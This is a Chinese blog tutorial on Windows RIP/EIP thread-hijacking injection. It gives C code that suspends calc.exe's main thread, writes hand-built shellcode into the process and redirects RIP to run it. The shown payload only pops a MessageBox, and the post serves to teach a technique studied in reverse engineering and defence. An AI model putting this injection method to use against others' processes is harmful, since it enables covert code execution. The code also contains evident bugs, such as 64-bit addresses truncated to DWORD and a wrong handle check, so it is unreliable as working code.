RIP/EIP 注入

最新推荐文章于 2023-06-16 09:05:58 发布
最新推荐文章于 2023-06-16 09:05:58 发布
阅读量2.3k 收藏 3
点赞数
分类专栏: R3下常见注入总结
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ndl1302732/article/details/83024822
版权

高手请飘过~~~~~~~~~~~~~~~~~

RIP --- x64体系
EIP --- x86体系


RIP/EIP注入原理:
    1 挂起目标线程,需要用到 SuspendThread 函数
    2 挂起之后获取目标线程的上下文,需要用到 GetThreadContext函数
      这个函数可以获得一个CONTEXT结构体封装的数据。这个结构体的定义在winnt.h头文件中
      结构体里面存储了当前线程的上下文信息,比如当前线程的RIP/EIP在哪里,通用寄存器的值是
      多少等等。
    3 RIP/EIP注入关键就是修改Context中的RIP/EIP寄存器。使得要执行的代码强制跳转到我们
      指定的代码。最后将上下文设置回去,这用到 SetThreadContext 函数,最后执行ResumeThread
      函数,将挂起线程恢复执行。
      
难点:
    1 位置无关代码编写,为什么要位置无关这里不再多说了。
    2 要注意函数栈对齐问题,其实我这个问题也没太搞明白,
      总之就是栈没对齐,我的例子代码在调用MessageBox时会报错,详细情况看shellcode的注释
      有懂得希望留言,指教一二。

#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <Tlhelp32.h>


#include "D:\\VS\\DllToInject\\DllToInject\\Utils.h"

#pragma comment(lib, "D:\\VS\\DllToInject\\x64\\Release\\UtilDll.lib")

CHAR shellcode[] = {
	0x68, 0x78, 0x56, 0x34, 0x12,		//push org rip (这里需要修复成原来的rip,暂时用0x12345678占位 见FixShellCode) 

	0x41, 0x51,							//push r9
	0x41, 0x50,							//push r8
	0x52,								//push rdx
	0x51,								//push rcx
	0x50,								//push rax

	0x48, 0x83, 0xEC, 0x28,				//sub rsp, 28  这个代码不加调用MessageBox会莫名其妙出错,好像是x64需要栈 mod 16对齐

	0x41, 0xB9, 0x00, 0x00, 0x00, 0x00, //mov r9d,0
	0x41, 0xB8, 0x00, 0x00, 0x00, 0x00, //mov r8d,0
	0xBA, 0x00, 0x00, 0x00, 0x00,		//mov edx,0
	0xB9, 0x00, 0x00, 0x00, 0x00,		//mov ecx,0
	0xB8, 0x78, 0x56, 0x34, 0x12,		//mov eax, messagebox (这里需要修复成Messagebox的地址,暂时用0x12345678占位 见FixShellCode)
	0xFF, 0xD0,							//call rax

	0x48, 0x83, 0xC4, 0x28,				//add rsp, 28 平衡栈,很简单

	0x58,								//pop rax
	0x59,								//pop rcx
	0x5A,								//pop rdx
	0x41, 0x58,							//pop r8
	0x41, 0x59,							//pop r9

	0xC3								//ret 返回到原来的Rip, 这里很关键
};

//修复shellcode中的两处绝对地址
//oldRip 线程挂起前的RIP
//pfn Messagebox的地址
//偷懒起见, 这里利用for循环找0x12345678,找到了就修复,否则需要去数数比较麻烦
void FixShellCode(DWORD oldRip, DWORD pfn){
	for (int i = 0; i < sizeof(shellcode); ++i){
		if (*(DWORD *)(shellcode + i) == 0x12345678){
			*(DWORD *)(shellcode + i) = oldRip;//修复RIP
			break;
		}
	}

	for (int i = 0; i < sizeof(shellcode); ++i){
		if (*(DWORD *)(shellcode + i) == 0x12345678){
			*(DWORD *)(shellcode + i) = pfn;//修复messagebox的地址
			break;
		}
	}

}



int _tmain(int argc, _TCHAR* argv[])
{
	if (!AdjustProcessTokenPrivilege()){
		printf("提权失败\n");
	}

	DWORD dwPid = GetPidByName("calc.exe");
	if (dwPid == 0){
		printf("GetPidByName failed\n");
		return -1;
	}
	printf("calc.exe pid=%d\n", dwPid);

	DWORD dwThreadId = GetMainThread(dwPid);
	printf("calc main thread id = %d\n", dwThreadId);

	HANDLE hProcess;
	hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
	if (hProcess == NULL)
	{
		MyOutputDebugString("打开进程失败!!!!");
		return -1;
	}

	//打开目标主线程
	HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, dwThreadId);

	if (!OpenThread)
	{
		printf("OpenThread 失败");
		goto SAFE_EXIT;
	}

	//挂起目标主线程
	DWORD bRet = SuspendThread(hThread);
	if (bRet == -1)
	{
		printf("SuspendThread 失败");
		goto SAFE_EXIT;
	}

	CONTEXT oldContext = { 0 };
	CONTEXT newContext = { 0 };
	DWORD dwOldEip = 0;

	oldContext.ContextFlags = CONTEXT_FULL;
	bRet = GetThreadContext(hThread, &oldContext);
	if (!bRet)
	{
		printf("GetThreadContext 失败");
		goto SAFE_EXIT;
	}
	newContext = oldContext;

	//两个函数地址的差值就是shellcode代码的大小,可能会有一些多的对齐数据,但是不影响
	DWORD funcSize = sizeof(shellcode);
	printf("shellcode size =%d\n", funcSize);
	FixShellCode(oldContext.Rip, (DWORD)MessageBox);

	//1.在远程进程中分配内存,可读可写可执行
	LPVOID pszRemoteBuffer = (char *)VirtualAllocEx(hProcess, NULL, USN_PAGE_SIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	
	if (pszRemoteBuffer == NULL)
	{
		printf("申请远程空间失败");
		CloseHandle(hProcess);
		return -1;
	}

	printf("buffer = %p\n", pszRemoteBuffer);

	//2.在远程申请的内存空间中写入shellcode
	SIZE_T dwWriten = 0;
	if (!WriteProcessMemory(hProcess, pszRemoteBuffer, shellcode, funcSize, &dwWriten))
	{
		printf("写入shellcode失败");
		CloseHandle(hProcess);
		VirtualFreeEx(hProcess, pszRemoteBuffer, USN_PAGE_SIZE, MEM_DECOMMIT);
		return -1;
	}

	printf("shellcode write bytes:%d\n", dwWriten);

#ifdef _WIN64
	newContext.Rip = (DWORD)pszRemoteBuffer;
	//dwOldEip = newContext.Rip;
#else 
	newContext.Eip = (DWORD)g_lpBuffer;
	//dwOldEip = newContext.Eip;
#endif

	bRet = SetThreadContext(hThread, &newContext);
	if (!bRet)
	{
		printf("SetThreadContext 失败");
		goto SAFE_EXIT;
	}


	//然后把主线程跑起来
	bRet = ResumeThread(hThread);
	if (bRet == -1)
	{
		printf("ResumeThread 失败");
		goto SAFE_EXIT;
	}

	//等shellcode运行完毕,然后再释放内存 VirtualFreeEx
	Sleep(3000);

SAFE_EXIT:

	if (hThread){
		CloseHandle(hThread);
	}

	
	VirtualFreeEx(hProcess, pszRemoteBuffer, USN_PAGE_SIZE, MEM_DECOMMIT);
	CloseHandle(hProcess);

	return 0;
}

 

ndl1302732
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
易语言线程EIP注入卸载DLL
07-22
易语言线程EIP注入卸载DLL源码,线程EIP注入卸载DLL,打开线程,原_按钮2_被单击,线程EIP注入,取进线程ID,卸载DLL,GetThreadContext,SetThreadContext,打开进程_,OpenThread,关闭内核对象_,取进程线程标识符_,SuspendThread,ResumeThread,GetProcAddress,GetModu
远程注入 注入工具
01-26
6. **执行注入代码**:一旦代码被写入,就需要触发其执行,可能是通过修改指令指针寄存器EIP/RIP),或者通过创建的线程执行。 在提供的文件中,`DllTool.dll`很可能是用于注入的DLL文件,其中包含了待注入的代码...
C# 实现shellcode 进程启动注入eip注入
记事本
01-07 2294
首先说下代码原理   1.使用CreateProcess 创建一个带 CREATE_SUSPENDED标记的进程 自然进程创建加载完DLL后会被挂起。 CREATE_SUSPENDED 标记本是为调试器准备的。 2.然后用GetThreadContext获取该进程的线程上下文,保存下来(重要)。。。。 3.用VirtualAllocEx 在进程空间申请一段 dll路径长度 + 32字节的内
[DLL 注入] C/C++ 修改EIP实现DLL注入
LYSM
11-28 870
背景 挂起目标进程,停止目标进程EIP的变换,在目标进程开启空间,然后把相关的指令机器码和数据拷贝到里面去,然后修改目标进程EIP使其强行跳转到我们拷贝进去的相关机器码位置,执行相关,然后跳转回来。下面的例子是实现DLL注入,但是和平时说的远程代码注入注入的逻辑上不同,但是同时都是用到了一个重要的结论就是:很多系统dll的导出函数地址在不同进程中,是一样的. 注意两个问题 1.call 如果直接是个地址的话要这么计算     call RVA - call指令的下一条地址 RVA - (nowaddres
rip/eip/rbp/ebp
魂淡林的博客
03-27 3967
栈帧中存储的寄存器变量,例如指令寄存器(64位环境中用 rip 表示,32为环境中用 eip 表示)、堆栈基指针寄存器(64位环境用 rbp 表示,32位环境用 ebp 表示)等。
易语言EIP永久注入
511遇见
05-28 3914
EIP寄存器的一种,它和EBP、ESP都是为“栈”而生,用来存储CPU要读取指令的地址,CPU通过EIP寄存器读取即将要执行的指令。每次CPU执行完相应的汇编指令之后,EIP寄存器的值就会增加。EIP存储着下一条指令的地址,每执行一条指令,该寄存器变化一次。易语言实现EIP永久注入,步骤难道很大,需要先看看以下文章:易语言EIP注入 易语言EIP永久注入步骤 1、获取进程ID和注入DLL路径 2、打开进程,获取进程句柄 3、获取系统线程快照句柄,包涵进程中所有的块照 4、通过对比获取线程ID 5、打.
Intel 64/x86_64/x86/IA-32处理器的指令指针(IP/EIP/RIP)
一凡stkeke
01-15 8205
Instruction Pointer 指令指针IP/EIP/RIP的基本功用是指向要执行的下一条地址。在8080 8位微处理器上的寄存器名称是PC(program counter,程序计数器),从8086起,被称为IP(instruction pointer,指令指针)。主要区别在与PC指向正在执行的指令,而IP指向下一条指令。 指令指针EIP寄存器包含了当前代码段中的一个偏移量,通过CS...
Windows x86/ x64 Ring3层注入Dll总结
09-30
使用SetThreadContext函数修改线程的上下文,改变EIP(x86)或RIP(x64)寄存器,使其指向DllMain的入口点。 **3. 插入Apc队列注入** 通过QueueUserAPC函数将自定义的APC函数插入到目标进程的线程队列中,当线程...
libinject2-64:android所以为arm64注入
05-19
4. **注入代码**:通过内存操作将新的函数或代码片段写入目标进程的内存空间,这可能涉及到计算指令指针(EIP/RIP)和修改程序计数器(PC)。 5. **执行注入代码**:一旦代码注入完成,需要触发执行,可能通过修改...
通过修改EIP寄存器实现强行跳转并且注入DLL到目标进程里
10-21
通过修改EIP寄存器实现强行跳转并且注入DLL到目标进程里
injector2:使用RT Code Cave的代码注入
05-21
5. **触发执行**:最后,通过修改目标进程的指令指针(EIP,x64架构下为RIP),使得程序在适当的时间执行注入的代码。 在使用"injector2"的过程中,开发者需要具备一定的逆向工程和编程基础,理解PE文件格式和...
linux-inject-master.zip
06-03
4. **执行注入代码**:一旦库被加载,我们可以通过`dlsym`找到库中定义的函数地址,然后通过`ptrace`注入一个新线程或者修改现有线程的指令指针(EIP/RIP)来执行注入的代码。 5. **函数Hook**:在注入的代码中,...
32位和64位的ProcessHollowing_C_下载.zip
04-26
5. 修改执行点(EIP/RIP):在32位系统中,修改EIP寄存器;在64位系统中,修改RIP寄存器,以确保进程执行注入的代码而非原代码。 6. 恢复目标进程:解除暂停,让进程继续运行,此时它将执行注入的恶意代码。 在...
完美支持64&32位InlineHook,C语言,C++类 都有
09-17
Inline Hook是一种技术,它允许你修改程序中的函数调用,以在不替换原函数的情况下,在其内部注入自定义的行为。这种技术在系统监控、调试、性能优化和恶意软件中都有广泛应用。本文将深入探讨64位和32位环境下如何...
【Android 逆向】Android 进程注入工具开发 ( EIP 寄存器指向 dlopen 函数 | ESP 寄存器指向栈内存 | 调试程序收回目标进程控制权 )
让 学习 成为一种 习惯 ( 韩曙亮 の 技术博客 )
11-02 814
一、EIP 寄存器指向 dlopen 函数、 二、ESP 寄存器指向栈内存、 三、调试程序收回目标进程控制权、
通过修改EIP寄存器实现32位程序的DLL注入
weixin_30553837的博客
05-26 228
功能:通过修改EIP寄存器实现32位程序的DLL注入 <如果是64位 记得自己对应修改汇编代码部分> 原理:挂起目标进程,停止目标进程EIP的变换,在目标进程开启空间,然后把相关的指令机器码和数据拷贝到里面去,然后修改目标进程EIP使其强行跳转到我们拷贝进去的相关机器码位置,执行相关,然后跳转回来。下面的例子是实现DLL注入,但是和平时说的远程代码注入注入的逻辑上不同,但是同时都是...
驱动开发:内核RIP劫持实现DLL注入
最新发布
CSDN
06-16 7550
本章将探索内核级DLL模块注入实现原理,DLL模块注入在应用层中通常会使用`CreateRemoteThread`直接开启远程线程执行即可,驱动级别的注入有多种实现原理,而其中最简单的一种实现方式则是通过劫持EIP的方式实现,其实现原理可总结为,挂起目标进程,停止目标进程EIP的变换,在目标进程开启空间,并把相关的指令机器码和数据拷贝到里面去,然后直接修改目标进程EIP使其强行跳转到我们拷贝进去的相关机器码位置,执行相关代码后,然后再次跳转回来执行原始指令集。
RIP综合实验
weixin_48992024的博客
08-31 225
rip路由信息协议:缺省路由,RIPV2的认证,RIPV2的汇总,空接口;
res.sendRedirect(portalUrl + "/eip_sso/aiportalLogin.html?appid=na186&success="+ serviceUrl +"/ssoclient/ssologin&error="+ portalUrl +"/eip_sso/aiportalLogin.html&return="+ portalUrl +"/eip_sso/aiportalLogin.html");改成模拟 form 重定向
05-24
out.println("<form id='redirectForm' method='post' action='" + portalUrl + "/eip_sso/aiportalLogin.html?appid=na186'>"); out.println("<input type='hidden' name='success' value='" + serviceUrl + "/sso...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值